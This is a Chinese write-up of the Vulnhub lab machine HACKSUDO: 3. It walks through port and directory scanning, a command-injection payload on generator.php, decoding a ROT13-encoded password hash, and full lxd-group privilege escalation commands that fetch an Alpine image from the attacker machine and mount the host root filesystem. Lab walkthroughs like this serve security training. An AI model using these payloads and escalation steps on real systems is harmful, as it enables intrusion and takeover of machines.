Vulnhub靶机测试 NO.29 HACKSUDO: 3 命令执行+凯撒密码sha512解密, + lxd提权

Vulnhub靶机测试 NO.29 HACKSUDO: 3

1 靶机介绍

1.1 靶机地址

https://www.vulnhub.com/entry/hacksudo-fog,697/

1.2 环境搭建

使用VirtualBox启动,靶机ip与kali ip配置 同段

2 测试过程

2.1 nmap探测ip

nmap -sP 192.168.56.0/24
在这里插入图片描述

2.2 nmap扫描端口

nmap -sC -sV -A -p- 192.168.56.119 -o port.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-17 09:46 CST
Nmap scan report for 192.168.56.119
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: Link Lock - Password-protect links
MAC Address: 08:00:27:A6:1E:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.56.119

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.34 seconds

探测到21 22 端口被过滤
21/tcp filtered ftp
22/tcp filtered ssh
开放端口有
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))

操作系统类型版本
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6

2.3 测试思路

只能通过80端口测试漏洞。
首页功能点测试,源码js文件审查,目录扫描,扫描页面功能点测试。

2.4 浏览首页

在这里插入图片描述
发现是一处url链接加密的工具,
发现一些密码 进行记录下来

avocado
urlpage5
torrenting_is-legal!
暂时没有发现其他可利用的点

2.5 目录扫描

gobuster dir -u 192.168.56.119/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt

在这里插入图片描述
发现三个 php页面
/info.php (Status: 200) [Size: 83324]
/login.php (Status: 200) [Size: 497]
/generator.php (Status: 200) [Size: 647]

2.5.1 访问info.php (有用)

在这里插入图片描述
phpinfo页面

2.5.2 访问login.php

在这里插入图片描述
登录页面
测试不提示 账号是否正确

2.5.3 访问generator.php(命令注入)

在这里插入图片描述
一个名称生成器

测试发现存在命令注入
payload

Youth && id

在这里插入图片描述

2.6 命令注入反弹shell

2.6.1 kali开启监听

在这里插入图片描述

2.6.2 反弹shell

在这里插入图片描述
注意bp发送post数据需要url编码 &&

2.7 切换完整shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm 然后 Ctrl+Z 退出来一下
stty raw -echo;fg 回车后输入 reset 再回车
stty rows 46 columns 188

在这里插入图片描述

切换后就可以命令按tab补全等功能

2.8 提权至hacksudo账号

2.8.1 信息收集

在网站目录下发现一个hacksudo 文件

在这里插入图片描述

unpxfhqb ybpxre FFU hfreanzr:unpxfhqb cnffjbeq:63p9142792q571q0s7p28ro30626q6s38792n2r7679o76q784231676q62447so80ns8953745s709p6622qqn2po4q754p262q0q31o3030n08s7o524079n6o336o

看起来像是加密 又有文字 可能是凯撒密码

它是一种替换加密的技术,明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移后被替换成密文。例如,当偏移量是3的时候,所有的字母A将被替换成D,B变成E,以此类推。
2.8.2 凯撒密码解密

最后通过移位13位 得到明文
在这里插入图片描述
hacksudo locker SSH username:hacksudo password:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b

2.8.3 sha512解密

在这里插入图片描述
vishal

2.8.4 su hacksudo -l

su hacksudo -l
vishal
在这里插入图片描述

登录hacksudo 账号成功
得到user.txt的flag
在这里插入图片描述

2.9 lxd提权至root

一般提权我们会看
用户组
内核漏洞
sudo权限
suid文件
cron定时任务
特殊文件权限
不常见的文件等等

2.9.1 用户组

在这里插入图片描述
看见了所属组有lxd
我们可以利用lxd的漏洞将 lxd组用户提权至root

2.9.2 kali攻击机操作
  1. 通过git将构建好的alpine镜像克隆至本地;

    git clone https://github.com/saghul/lxd-alpine-builder.git
    
  2. 执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

    cd lxd-alpine-builder   
    sudo ./build-alpine
    

    在这里插入图片描述
    在这里插入图片描述

  3. 将tar文件发送至目标设备;

    下载好后 启动python http访问

    python3 -m http.server 80
    
2.9.3 靶机操作

靶机操作:

  1. 下载攻击机上的alpine-v3.15-x86_64-20220124_1022.tar.gz

    wget http://192.168.56.137/alpine-v3.15-x86_64-20220317_1435.tar.gz
    
  2. 导入镜像并初始化镜像

    lxc image import ./alpine-v3.15-x86_64-20220317_1435.tar.gz --alias test
    lxc init test test -c security.privileged=true
    

    在这里插入图片描述
    报错了 说没有初始化

    lxd init    一路回车
    

    在这里插入图片描述

    lxc init test test -c security.privileged=true 初始化镜像
    

在这里插入图片描述

  1. 挂载磁盘

    lxc config device add test test disk source=/ path=/mnt/root recursive=true
    

    在这里插入图片描述

  2. 启动镜像并进入镜像访问任意文件

    lxc start test
    lxc exec test /bin/sh
    id
    cd /mnt/root
    ls
    cd /root
    cat proof.txt
    cat root.txt
    

在这里插入图片描述

3 总结

该靶机通过
1.nmap端口信息收集 只扫出80端口。
2.gobuster目录扫描,扫出phpinfo,generator页面(存在命令执行&&id) getshell
3.凯撒密码移位13位和sha512解密 提权至hacksudo用户。
4.lxd提权至root。

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值